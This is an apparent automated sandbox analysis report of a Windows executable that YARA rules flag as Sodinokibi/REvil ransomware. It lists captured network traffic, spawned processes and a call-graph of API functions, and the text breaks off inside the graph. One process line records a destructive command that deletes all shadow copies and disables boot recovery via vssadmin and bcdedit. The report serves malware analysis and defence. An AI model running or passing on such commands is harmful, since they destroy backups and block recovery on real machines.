                            2023-11-16 23:52:02 UTC7OUTData Raw: 16 4f e1 0b 1d df ba 5d f2 1a d1 04 36 b0 45 11 d8 58 8d 73 76 3a 14 82 2e 8a 0c 1b f1 b5 6e 11 75 ea d0 27 be 58 68 27 21 aa a5 01 78 cd bb 17 b6 be 21 f3 40 0d 6e 23 c1 8b 89 0d 89 3a ca e7 0d b4 55 ab a1 da 95 64 8b f9 6b 43 65 9c 6b 91 05 b1 1d 8a 46 09 6f f5 b3 77 31 00 15 a9 b6 8e a4 a0 10 90 b2 ae ab 37 a2 9e 95 22 7d c3 29 96 59 45 34 c5 94 8a af d2 87 6a a0 a0 59 8e c0 50 2a 1c 1d 58 fb c9 15 7b 10 cd 17 ff a8 e9 c2 e4 63 d1 70 71 19 e6 e4 4c 6c cf 0b 14 e5 f8 38 93 43 45 38 a9 b4 10 49 3b 0a 10 d2 e6 0b 25 b6 c5 8c d8 0b 79 3c c1 0b 6a 64 8e 01 9a 40 bc f4 cc 94 f1 00 21 2d b2 0f 1d 03 46 3e c4 46 b1 25 d0 3e 05 60 11 d9 9f 44 8e e1 f2 4b af ca c5 42 38 50 91 90 58 84 68 8a c6 3d 31 7c bf ed c8 dc ea ee 67 78 8f 8e 29 56 1e 2c 0b 9d 9b 42 3c 02
                            Data Ascii: O]6EXsv:.nu'Xh'!x!@n#:UdkCekFow17"})YE4jYP*X{cpqLl8CE8I;%y<jd@!-F>F%>`DKB8PXh=1|gx)V,B<
                            2023-11-16 23:52:03 UTC8INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Thu, 16 Nov 2023 23:52:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                            Cache-Control: no-cache, must-revalidate, max-age=0
                            Link: <https://www.so-sage.fr/wp-json/>; rel="https://api.w.org/"
                            2023-11-16 23:52:03 UTC8INData Raw: 31 65 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 6f 2d 73 61 67 65 2e 66 72 2f 78 6d 6c 72 70 63 2e 70 68
                            Data Ascii: 1ea2<!DOCTYPE html><html lang="fr-FR"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11"><link rel="pingback" href="https://www.so-sage.fr/xmlrpc.ph


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:00:49:56
                            Start date:17/11/2023
                            Path:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            Imagebase:0xd90000
                            File size:167'936 bytes
                            MD5 hash:CA337C7130EEF4F4FF8E8A4A8EC28647
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Windows_Ransomware_Sodinokibi_a282ba44, Description: Identifies SODINOKIBI/REvil ransomware, Source: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                            • Rule: Windows_Ransomware_Sodinokibi_a282ba44, Description: Identifies SODINOKIBI/REvil ransomware, Source: 00000000.00000000.1664633895.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                            Reputation:low
                            Has exited:false

                            Target ID:4
                            Start time:00:50:24
                            Start date:17/11/2023
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures
                            Imagebase:0x240000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:5
                            Start time:00:50:26
                            Start date:17/11/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Reset < >

                              Execution Graph

                              Execution Coverage:33.2%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:10.9%
                              Total number of Nodes:1005
                              Total number of Limit Nodes:7
                              execution_graph 3494 d935fd 3499 d935b4 3494->3499 3496 d93604 3516 d93e06 ExitProcess 3496->3516 3500 d9695e 3499->3500 3501 d935b9 SetErrorMode 3500->3501 3517 d947b3 3501->3517 3504 d935ca 3522 d93e06 ExitProcess 3504->3522 3505 d935d4 3523 d91ac0 3505->3523 3509 d935e8 3546 d94a91 GetCurrentProcess 3509->3546 3510 d935dd GetCurrentProcessId 3537 d96963 3510->3537 3513 d935d1 3513->3496 3595 d94d1a 3517->3595 3519 d947d1 CreateMutexW 3520 d935c6 3519->3520 3521 d947f1 RtlGetLastWin32Error 3519->3521 3520->3504 3520->3505 3521->3520 3597 d91a6e 3523->3597 3525 d91acc 3531 d91b12 3525->3531 3602 d9a3cf 3525->3602 3528 d91b0c 3530 d93b82 RtlFreeHeap 3528->3530 3529 d91b17 3608 d955a6 3529->3608 3530->3531 3531->3509 3531->3510 3708 d969be SystemTimeToFileTime 3537->3708 3540 d9696f 3540->3509 3542 d96978 VirtualAlloc 3545 d969a9 3542->3545 3545->3509 3725 d94562 GetPEB 3546->3725 3548 d94aa5 3549 d935ee 3548->3549 3726 d93f31 OpenProcessToken 3548->3726 3570 d92d34 3549->3570 3554 d94ad5 3736 d94806 ReleaseMutex 3554->3736 3559 d94af0 ExitProcess 3560 d94af7 3748 d944b3 3560->3748 3562 d94afc 3563 d94b15 GetForegroundWindow 3562->3563 3564 d94b5c ShellExecuteExW 3563->3564 3564->3564 3565 d94b6a 3564->3565 3566 d93b82 RtlFreeHeap 3565->3566 3567 d94b70 3566->3567 3568 d93b82 RtlFreeHeap 3567->3568 3569 d94b76 ExitProcess 3568->3569 3763 d942de 3570->3763 3586 d92d5f 3844 d9457f CreateToolhelp32Snapshot 3586->3844 3587 d92d81 3861 d92aaf 3587->3861 3594 d92daa 3910 d913b4 3594->3910 3596 d94d37 3595->3596 3596->3519 3599 d91a82 3597->3599 3598 d91a8d 3598->3525 3599->3598 3624 d93b35 3599->3624 3601 d91a9d 3601->3525 3607 d9a3e9 3602->3607 3603 d91b03 3603->3528 3603->3529 3604 d9afde 3604->3603 3605 d9b019 RtlFreeHeap 3604->3605 3605->3603 3606 d9b0c4 RtlAllocateHeap HeapCreate GetProcessHeap 3606->3607 3607->3603 3607->3604 3607->3606 3609 d91b53 3608->3609 3610 d955b9 3608->3610 3617 d9b019 3609->3617 3610->3609 3633 d91286 3610->3633 3637 d91254 3610->3637 3642 d91222 3610->3642 3647 d911f0 3610->3647 3652 d91320 3610->3652 3657 d9119f 3610->3657 3618 d9b024 3617->3618 3619 d91b5f 3617->3619 3618->3619 3620 d93b82 RtlFreeHeap 3618->3620 3621 d93b82 3619->3621 3620->3618 3707 d93b1f RtlFreeHeap 3621->3707 3623 d93b93 3623->3531 3625 d93b41 HeapCreate 3624->3625 3626 d93b64 3624->3626 3625->3626 3627 d93b59 GetProcessHeap 3625->3627 3630 d93ad7 3626->3630 3627->3626 3629 d93b7e 3629->3601 3631 d93ae0 3630->3631 3632 d93ae4 RtlAllocateHeap 3630->3632 3631->3629 3632->3629 3634 d912a5 3633->3634 3635 d955a6 8 API calls 3634->3635 3636 d91318 3635->3636 3636->3610 3662 d953c1 3637->3662 3640 d9127f 3640->3610 3643 d953c1 3 API calls 3642->3643 3644 d9123a 3643->3644 3645 d9556b 6 API calls 3644->3645 3646 d9124d 3644->3646 3645->3646 3646->3610 3648 d953c1 3 API calls 3647->3648 3649 d91208 3648->3649 3650 d9121b 3649->3650 3651 d9556b 6 API calls 3649->3651 3650->3610 3651->3650 3653 d953c1 3 API calls 3652->3653 3654 d91338 3653->3654 3655 d9134b 3654->3655 3656 d9556b 6 API calls 3654->3656 3655->3610 3656->3655 3658 d953c1 3 API calls 3657->3658 3659 d911b7 3658->3659 3660 d911ca 3659->3660 3661 d9556b 6 API calls 3659->3661 3660->3610 3661->3660 3673 d93af4 HeapCreate 3662->3673 3664 d953cd 3665 d93ad7 RtlAllocateHeap 3664->3665 3667 d9126c 3664->3667 3666 d95406 3665->3666 3666->3667 3674 d93b11 HeapDestroy 3666->3674 3667->3640 3669 d9556b 3667->3669 3670 d9559b 3669->3670 3671 d9557a 3669->3671 3670->3640 3671->3670 3675 d91000 3671->3675 3673->3664 3674->3667 3676 d9100b 3675->3676 3679 d95421 3676->3679 3680 d95432 3679->3680 3681 d93ad7 RtlAllocateHeap 3680->3681 3692 d91014 3680->3692 3682 d95459 3681->3682 3682->3692 3693 d95099 3682->3693 3684 d9546a 3685 d95479 3684->3685 3698 d94bc4 MultiByteToWideChar 3684->3698 3687 d954a4 3685->3687 3689 d93b82 RtlFreeHeap 3685->3689 3685->3692 3688 d954b3 3687->3688 3690 d93b82 RtlFreeHeap 3687->3690 3706 d93b1f RtlFreeHeap 3688->3706 3689->3687 3690->3688 3692->3671 3694 d950a2 3693->3694 3695 d950a6 3693->3695 3694->3684 3696 d93b35 3 API calls 3695->3696 3697 d950b6 3696->3697 3697->3684 3699 d94be3 3698->3699 3705 d94c0c 3698->3705 3700 d93b35 3 API calls 3699->3700 3701 d94bec 3700->3701 3702 d94bf3 MultiByteToWideChar 3701->3702 3701->3705 3703 d94c06 3702->3703 3702->3705 3704 d93b82 RtlFreeHeap 3703->3704 3704->3705 3705->3685 3706->3692 3707->3623 3709 d96a09 3708->3709 3710 d9696b 3708->3710 3723 d94562 GetPEB 3709->3723 3710->3540 3722 d94481 GetNativeSystemInfo 3710->3722 3712 d96a0e 3713 d96a18 Wow64DisableWow64FsRedirection 3712->3713 3714 d96a2a GetSystemDirectoryW 3712->3714 3713->3710 3713->3714 3714->3710 3715 d96a40 3714->3715 3716 d96ac6 GetFileAttributesExW 3715->3716 3718 d96af3 3715->3718 3716->3715 3717 d96ad3 CompareFileTime 3716->3717 3717->3715 3724 d94562 GetPEB 3718->3724 3720 d96afb 3720->3710 3721 d96b05 Wow64RevertWow64FsRedirection 3720->3721 3721->3710 3722->3542 3723->3712 3724->3720 3725->3548 3727 d93f4e GetTokenInformation 3726->3727 3728 d93f72 3726->3728 3759 d93cce 3727->3759 3728->3549 3730 d94039 OpenProcessToken 3728->3730 3731 d94055 GetTokenInformation 3730->3731 3735 d9408e 3730->3735 3732 d9406e IsValidSid 3731->3732 3733 d9407d 3731->3733 3732->3733 3734 d93cce FindCloseChangeNotification 3733->3734 3734->3735 3735->3549 3735->3554 3737 d93cce FindCloseChangeNotification 3736->3737 3738 d9481d 3737->3738 3739 d9410c 3738->3739 3740 d93b35 3 API calls 3739->3740 3741 d9411b 3740->3741 3742 d94126 GetModuleFileNameW 3741->3742 3744 d9414f 3741->3744 3745 d93b82 RtlFreeHeap 3741->3745 3747 d93b35 3 API calls 3741->3747 3742->3741 3743 d94151 3742->3743 3743->3744 3746 d93b82 RtlFreeHeap 3743->3746 3744->3559 3744->3560 3745->3741 3746->3744 3747->3741 3762 d93cf0 GetCommandLineW CommandLineToArgvW 3748->3762 3750 d944c2 3751 d94544 3750->3751 3752 d944dd 3750->3752 3753 d944d2 LocalFree 3750->3753 3751->3562 3754 d9453b LocalFree 3752->3754 3755 d944fe 3752->3755 3753->3751 3754->3751 3756 d93b35 3 API calls 3755->3756 3758 d94507 3756->3758 3757 d94530 LocalFree 3757->3751 3758->3757 3760 d93ce0 3759->3760 3761 d93cd7 FindCloseChangeNotification 3759->3761 3760->3728 3761->3760 3762->3750 3764 d94d1a 3763->3764 3765 d942fc GetCurrentProcess 3764->3765 3766 d94039 4 API calls 3765->3766 3767 d94311 3766->3767 3771 d92d3b 3767->3771 3921 d94203 3767->3921 3770 d9433b OpenProcessToken 3772 d94358 ImpersonateLoggedOnUser 3770->3772 3773 d9434f 3770->3773 3778 d9149e 3771->3778 3775 d93cce FindCloseChangeNotification 3772->3775 3774 d93cce FindCloseChangeNotification 3773->3774 3774->3771 3776 d9436a 3775->3776 3777 d93cce FindCloseChangeNotification 3776->3777 3777->3771 3779 d91a6e 3 API calls 3778->3779 3780 d914ad 3779->3780 3781 d9a3cf 4 API calls 3780->3781 3843 d91506 3780->3843 3782 d914f4 3781->3782 3783 d91500 3782->3783 3785 d9150c 3782->3785 3784 d93b82 RtlFreeHeap 3783->3784 3784->3843 3786 d955a6 8 API calls 3785->3786 3787 d917f1 3786->3787 3788 d9b019 RtlFreeHeap 3787->3788 3789 d91802 3788->3789 3790 d93b82 RtlFreeHeap 3789->3790 3791 d91808 3790->3791 3791->3843 3924 d94c77 CryptBinaryToStringW 3791->3924 3796 d91898 3944 d921f5 3796->3944 3804 d918c9 4010 d93e14 3804->4010 3805 d950ce 3 API calls 3805->3804 3808 d918e6 4018 d93f7a 3808->4018 3809 d950ce 3 API calls 3809->3808 3812 d91903 4029 d94096 3812->4029 3813 d950ce 3 API calls 3813->3812 3816 d91920 3817 d943b1 8 API calls 3816->3817 3819 d9192b 3817->3819 3818 d950ce 3 API calls 3818->3816 3820 d950ce 3 API calls 3819->3820 3821 d9193f 3820->3821 4035 d9422c 3821->4035 3824 d9195c 4041 d93e53 3824->4041 3825 d950ce 3 API calls 3825->3824 3828 d94c77 6 API calls 3829 d9197a 3828->3829 3830 d93b82 RtlFreeHeap 3829->3830 3831 d91985 3830->3831 4047 d94481 GetNativeSystemInfo 3831->4047 3833 d9198a 4048 d9207f 3833->4048 3839 d919a8 4080 d91365 3839->4080 3843->3586 3843->3594 3899 d943b1 3843->3899 3845 d92d6c 3844->3845 3846 d945a0 Process32FirstW 3844->3846 3851 d93d59 3845->3851 3847 d945ba 3846->3847 3848 d945e7 3847->3848 3850 d945d5 Process32NextW 3847->3850 3849 d93cce FindCloseChangeNotification 3848->3849 3849->3845 3850->3847 3852 d93d7b 3851->3852 3853 d93d9a GetForegroundWindow 3852->3853 3854 d93de6 ShellExecuteExW 3853->3854 3854->3854 3855 d92d74 3854->3855 3855->3587 3856 d93511 3855->3856 4247 d964f6 3856->4247 4420 d96022 3861->4420 3864 d92b7b 3864->3594 3873 d938c7 GetDC 3864->3873 3865 d964f6 36 API calls 3866 d92b2e 3865->3866 3867 d92b41 3866->3867 3868 d9658e 39 API calls 3866->3868 3869 d92b6d 3867->3869 3870 d92b4f 3867->3870 3868->3867 4433 d95f73 3869->4433 3870->3867 3870->3869 4446 d9486b Sleep 3870->4446 3874 d938e3 CreateCompatibleDC 3873->3874 3875 d92d8f 3873->3875 3876 d93ac8 ReleaseDC 3874->3876 3877 d938f8 GetDeviceCaps GetDeviceCaps CreateCompatibleBitmap 3874->3877 3875->3594 3895 d94ddb 3875->3895 3876->3875 3878 d9392c SelectObject GetDeviceCaps MulDiv CreateFontW 3877->3878 3879 d93ac0 DeleteDC 3877->3879 3880 d93970 SelectObject SetBkMode SetTextColor GetStockObject FillRect 3878->3880 3881 d93ab7 DeleteObject 3878->3881 3879->3876 3882 d93a53 DrawTextW 3880->3882 3892 d939c6 3880->3892 3881->3879 4530 d937c2 3882->4530 3884 d93a87 3885 d93aae DeleteObject 3884->3885 4548 d9360d GetObjectW 3884->4548 3885->3881 3887 d93a4d 3887->3882 3889 d93b82 RtlFreeHeap 3891 d93aad 3889->3891 3890 d94626 9 API calls 3890->3892 3891->3885 3892->3882 3892->3887 3892->3890 3893 d94626 9 API calls 3892->3893 3894 d93a16 SetPixel 3893->3894 3894->3892 3897 d94df4 3895->3897 3896 d94e21 3896->3594 3897->3896 4573 d925df 3897->4573 4613 d93bea GetUserDefaultUILanguage GetSystemDefaultUILanguage 3899->4613 3902 d943d0 3904 d93b35 3 API calls 3902->3904 3903 d92d55 3903->3586 3909 d93e06 ExitProcess 3903->3909 3905 d943db 3904->3905 3905->3903 3906 d943e2 GetKeyboardLayoutList 3905->3906 3908 d943ee 3906->3908 3907 d93b82 RtlFreeHeap 3907->3903 3908->3903 3908->3907 3911 d913e3 3910->3911 3915 d913f3 3911->3915 4615 d952d6 3911->4615 3913 d93b82 RtlFreeHeap 3913->3915 3914 d91498 3916 d94386 GetCurrentProcess 3914->3916 3915->3913 3915->3914 3917 d94039 4 API calls 3916->3917 3918 d94392 3917->3918 3919 d9439a RevertToSelf 3918->3919 3920 d92db7 3918->3920 3919->3920 3920->3513 3922 d9457f 4 API calls 3921->3922 3923 d94222 OpenProcess 3922->3923 3923->3770 3923->3771 3925 d94ca2 3924->3925 3931 d91879 3924->3931 3926 d93b35 3 API calls 3925->3926 3927 d94cae 3926->3927 3928 d94cb5 CryptBinaryToStringW 3927->3928 3927->3931 3929 d94ccb 3928->3929 3928->3931 3930 d93b82 RtlFreeHeap 3929->3930 3930->3931 3932 d94165 3931->3932 3933 d93b35 3 API calls 3932->3933 3934 d94173 3933->3934 3935 d91886 3934->3935 4097 d94879 3934->4097 3935->3796 3939 d950ce 3935->3939 3937 d94180 3938 d941e2 wsprintfW 3937->3938 3938->3935 3940 d950db 3939->3940 3941 d950d7 3939->3941 3942 d93b35 3 API calls 3940->3942 3941->3796 3943 d950f1 3942->3943 3943->3796 3945 d92219 3944->3945 4112 d946e5 RegOpenKeyExW 3945->4112 3948 d922ad 3950 d946e5 8 API calls 3948->3950 3949 d946e5 8 API calls 3949->3948 3951 d922cb 3950->3951 3952 d922ea 3951->3952 3953 d946e5 8 API calls 3951->3953 3954 d946e5 8 API calls 3952->3954 3953->3952 3955 d92309 3954->3955 3956 d9232c 3955->3956 3957 d946e5 8 API calls 3955->3957 3965 d92361 3956->3965 4123 d95639 3956->4123 3957->3956 3959 d923a2 4126 d959fc 3959->4126 3961 d923be 3962 d959fc 12 API calls 3961->3962 3964 d923d6 3962->3964 3963 d918a3 3984 d91b7b 3963->3984 3964->3963 4134 d94763 RegCreateKeyExW 3964->4134 3968 d924e0 3965->3968 3970 d93b82 RtlFreeHeap 3965->3970 3971 d93b82 RtlFreeHeap 3968->3971 3969 d92454 3973 d94763 3 API calls 3969->3973 3970->3968 3974 d924e7 3971->3974 3972 d94763 3 API calls 3972->3969 3976 d9246f 3973->3976 3975 d93b82 RtlFreeHeap 3974->3975 3978 d924ed 3975->3978 3977 d9248e 3976->3977 3979 d94763 3 API calls 3976->3979 3981 d94763 3 API calls 3977->3981 3980 d94c77 6 API calls 3978->3980 3979->3977 3980->3963 3982 d924ad 3981->3982 3982->3965 3983 d94763 3 API calls 3982->3983 3983->3965 3985 d91b9c 3984->3985 3986 d946e5 8 API calls 3985->3986 3987 d91bd5 3986->3987 3988 d91bfe 3987->3988 3989 d946e5 8 API calls 3987->3989 3990 d91c1b 3988->3990 3992 d93b82 RtlFreeHeap 3988->3992 4002 d91c93 3988->4002 3989->3988 4174 d92506 3990->4174 3992->3990 3994 d918ad 4003 d942a2 3994->4003 3995 d91c53 3998 d94763 3 API calls 3995->3998 3996 d93b82 RtlFreeHeap 3997 d91c25 3996->3997 3997->3994 3997->3995 3997->3996 3999 d92506 12 API calls 3997->3999 4000 d91c78 3998->4000 3999->3997 4001 d94763 3 API calls 4000->4001 4000->4002 4001->4002 4182 d954c6 4002->4182 4004 d93b35 3 API calls 4003->4004 4005 d942b1 4004->4005 4006 d918b7 4005->4006 4007 d942b8 GetUserNameW 4005->4007 4006->3804 4006->3805 4007->4006 4008 d942ce 4007->4008 4009 d93b82 RtlFreeHeap 4008->4009 4009->4006 4011 d93b35 3 API calls 4010->4011 4012 d93e20 4011->4012 4013 d918d4 4012->4013 4014 d93e27 GetComputerNameW 4012->4014 4013->3808 4013->3809 4015 d93e3d 4014->4015 4016 d93e43 4014->4016 4017 d93b82 RtlFreeHeap 4015->4017 4016->4013 4017->4016 4019 d93fa1 4018->4019 4020 d946e5 8 API calls 4019->4020 4021 d93fe2 4020->4021 4022 d93ff5 4021->4022 4024 d93ffe 4021->4024 4028 d918f1 4021->4028 4023 d93b82 RtlFreeHeap 4022->4023 4023->4028 4025 d93b82 RtlFreeHeap 4024->4025 4024->4028 4026 d94022 4025->4026 4027 d950ce 3 API calls 4026->4027 4027->4028 4028->3812 4028->3813 4030 d940b5 4029->4030 4031 d946e5 8 API calls 4030->4031 4032 d940f1 4031->4032 4033 d9190e 4032->4033 4034 d93b82 RtlFreeHeap 4032->4034 4033->3816 4033->3818 4034->4033 4036 d9424b 4035->4036 4037 d946e5 8 API calls 4036->4037 4038 d94287 4037->4038 4039 d9194a 4038->4039 4040 d93b82 RtlFreeHeap 4038->4040 4039->3824 4039->3825 4040->4039 4045 d93e68 4041->4045 4042 d9196b 4042->3828 4043 d93b35 3 API calls 4043->4045 4044 d93eb0 GetDriveTypeW 4044->4045 4045->4042 4045->4043 4045->4044 4046 d93ecc GetDiskFreeSpaceExW 4045->4046 4046->4045 4047->3833 4209 d91cab 4048->4209 4051 d9199e 4059 d92169 4051->4059 4052 d94c77 6 API calls 4053 d920a6 4052->4053 4054 d93b82 RtlFreeHeap 4053->4054 4055 d920ae 4054->4055 4055->4051 4227 d94e26 4055->4227 4057 d92145 4058 d93b82 RtlFreeHeap 4057->4058 4058->4051 4060 d92187 4059->4060 4061 d94e26 4 API calls 4060->4061 4062 d921af 4061->4062 4063 d950ce 3 API calls 4062->4063 4064 d921ca 4063->4064 4065 d954c6 6 API calls 4064->4065 4068 d919a3 4064->4068 4066 d921e4 4065->4066 4067 d93b82 RtlFreeHeap 4066->4067 4067->4068 4069 d91e4f 4068->4069 4070 d91cab 21 API calls 4069->4070 4071 d91e62 4070->4071 4072 d94c77 6 API calls 4071->4072 4075 d91e88 4071->4075 4073 d91e79 4072->4073 4074 d93b82 RtlFreeHeap 4073->4074 4076 d91e81 4074->4076 4075->3839 4076->4075 4077 d94e26 4 API calls 4076->4077 4078 d91fc3 4077->4078 4079 d93b82 RtlFreeHeap 4078->4079 4079->4075 4236 d93cf0 GetCommandLineW CommandLineToArgvW 4080->4236 4082 d91376 4084 d913aa 4082->4084 4237 d93ce2 LocalFree 4082->4237 4085 d91fda 4084->4085 4086 d91ff7 4085->4086 4087 d93b35 3 API calls 4086->4087 4088 d92013 4087->4088 4089 d92077 4088->4089 4238 d94d7b 4088->4238 4089->3843 4091 d9202d 4092 d950ce 3 API calls 4091->4092 4093 d92057 4092->4093 4093->4089 4094 d954c6 6 API calls 4093->4094 4095 d92071 4094->4095 4096 d93b82 RtlFreeHeap 4095->4096 4096->4089 4103 d94b86 GetWindowsDirectoryW 4097->4103 4099 d94883 4100 d9488b GetVolumeInformationW 4099->4100 4101 d948af 4099->4101 4102 d93b82 RtlFreeHeap 4100->4102 4101->3937 4102->4101 4104 d94b99 4103->4104 4105 d94b97 4103->4105 4106 d93b35 3 API calls 4104->4106 4105->4099 4107 d94ba3 4106->4107 4108 d94baa GetWindowsDirectoryW 4107->4108 4109 d94bbc 4107->4109 4108->4109 4110 d94bb6 4108->4110 4109->4099 4111 d93b82 RtlFreeHeap 4110->4111 4111->4109 4113 d92288 4112->4113 4114 d94706 RegQueryValueExW 4112->4114 4113->3948 4113->3949 4115 d94751 RegCloseKey 4114->4115 4116 d94720 4114->4116 4115->4113 4116->4115 4117 d93b35 3 API calls 4116->4117 4118 d9472b 4117->4118 4118->4115 4119 d94732 RegQueryValueExW 4118->4119 4119->4115 4120 d94748 4119->4120 4121 d93b82 RtlFreeHeap 4120->4121 4122 d9474e 4121->4122 4122->4115 4137 d9568c 4123->4137 4125 d95644 4125->3959 4127 d95a10 4126->4127 4128 d95a17 4126->4128 4127->3961 4129 d93b35 3 API calls 4128->4129 4130 d95a24 4129->4130 4130->4127 4131 d95639 9 API calls 4130->4131 4132 d95a4d 4131->4132 4133 d9580c 9 API calls 4132->4133 4133->4127 4135 d92431 4134->4135 4136 d94785 RegSetValueExW RegCloseKey 4134->4136 4135->3969 4135->3972 4136->4135 4140 d9580c 4137->4140 4141 d95830 4140->4141 4142 d95821 4140->4142 4156 d93df8 RtlEnterCriticalSection 4141->4156 4152 d9579d 4142->4152 4145 d95842 4149 d9585f 4145->4149 4157 d945f6 4145->4157 4146 d95826 4151 d9569b 4146->4151 4155 d943a3 RtlInitializeCriticalSection 4146->4155 4149->4151 4165 d944a5 RtlLeaveCriticalSection 4149->4165 4151->4125 4153 d945f6 6 API calls 4152->4153 4154 d957ae 4153->4154 4154->4146 4155->4141 4156->4145 4166 d94979 4157->4166 4159 d9460a 4159->4149 4160 d94604 4160->4159 4161 d9482b CryptAcquireContextW 4160->4161 4162 d94851 CryptGenRandom 4160->4162 4163 d94845 4161->4163 4164 d94847 4161->4164 4162->4149 4163->4149 4164->4162 4165->4151 4167 d949b4 4166->4167 4169 d94987 4166->4169 4167->4160 4169->4167 4170 d949c2 4169->4170 4172 d949cd 4170->4172 4171 d94a6c timeBeginPeriod timeGetTime Sleep timeGetTime 4171->4172 4172->4171 4173 d94a59 4172->4173 4173->4169 4175 d92514 4174->4175 4179 d92510 4174->4179 4196 d94626 4175->4196 4178 d93b35 3 API calls 4180 d92536 4178->4180 4179->3997 4180->4179 4181 d94626 9 API calls 4180->4181 4181->4180 4183 d954d7 4182->4183 4184 d954dd 4183->4184 4185 d93ad7 RtlAllocateHeap 4183->4185 4184->3994 4186 d954fe 4185->4186 4186->4184 4200 d95283 WideCharToMultiByte 4186->4200 4189 d9551e 4189->4184 4191 d95549 4189->4191 4192 d93b82 RtlFreeHeap 4189->4192 4190 d950ce 3 API calls 4190->4189 4193 d95558 4191->4193 4195 d93b82 RtlFreeHeap 4191->4195 4192->4191 4208 d93b1f RtlFreeHeap 4193->4208 4195->4193 4197 d94636 4196->4197 4199 d92520 4196->4199 4198 d9580c 9 API calls 4197->4198 4198->4199 4199->4178 4199->4179 4201 d952cc 4200->4201 4202 d952a4 4200->4202 4201->4189 4201->4190 4203 d93b35 3 API calls 4202->4203 4204 d952aa 4203->4204 4204->4201 4205 d952b1 WideCharToMultiByte 4204->4205 4205->4201 4206 d952c6 4205->4206 4207 d93b82 RtlFreeHeap 4206->4207 4207->4201 4208->4184 4210 d91ccf 4209->4210 4211 d946e5 8 API calls 4210->4211 4212 d91d08 4211->4212 4213 d91d28 4212->4213 4214 d946e5 8 API calls 4212->4214 4215 d91d4d 4213->4215 4216 d93b35 3 API calls 4213->4216 4214->4213 4215->4051 4215->4052 4217 d91d46 4216->4217 4217->4215 4218 d91d71 _snwprintf 4217->4218 4219 d91dec 4218->4219 4220 d959fc 12 API calls 4219->4220 4221 d91dfb 4220->4221 4222 d93b82 RtlFreeHeap 4221->4222 4223 d91e03 4222->4223 4223->4215 4224 d94763 3 API calls 4223->4224 4225 d91e25 4224->4225 4225->4215 4226 d94763 3 API calls 4225->4226 4226->4215 4228 d94e35 4227->4228 4231 d94e60 4227->4231 4230 d93b82 RtlFreeHeap 4228->4230 4228->4231 4232 d94e67 4228->4232 4230->4228 4231->4057 4233 d94ef1 4232->4233 4234 d94e7b 4232->4234 4233->4228 4234->4233 4235 d93b35 3 API calls 4234->4235 4235->4233 4236->4082 4237->4084 4239 d93b35 3 API calls 4238->4239 4240 d94d90 4239->4240 4241 d94bc4 6 API calls 4240->4241 4244 d94db7 4240->4244 4242 d94da8 4241->4242 4243 d93b82 RtlFreeHeap 4242->4243 4245 d94db0 4243->4245 4244->4091 4245->4244 4246 d93b82 RtlFreeHeap 4245->4246 4246->4244 4248 d93b35 3 API calls 4247->4248 4254 d96507 4248->4254 4249 d93554 4255 d9658e WNetOpenEnumW 4249->4255 4250 d9657f 4252 d93b82 RtlFreeHeap 4250->4252 4251 d9653e GetDriveTypeW 4251->4254 4252->4249 4254->4249 4254->4250 4254->4251 4268 d961ad 4254->4268 4256 d9355e 4255->4256 4257 d965b2 4255->4257 4256->3587 4258 d93b35 3 API calls 4257->4258 4259 d965c5 4258->4259 4260 d965cc WNetCloseEnum 4259->4260 4266 d965d9 4259->4266 4260->4256 4261 d965db WNetEnumResourceW 4261->4266 4262 d96637 4263 d93b82 RtlFreeHeap 4262->4263 4264 d9663d WNetCloseEnum 4263->4264 4264->4256 4266->4261 4266->4262 4267 d9658e 35 API calls 4266->4267 4413 d96431 4266->4413 4267->4266 4288 d92650 4268->4288 4269 d961d4 4280 d961f0 4269->4280 4295 d9649f 4269->4295 4272 d963ad 4272->4254 4273 d96393 4273->4272 4275 d93b82 RtlFreeHeap 4273->4275 4274 d93b82 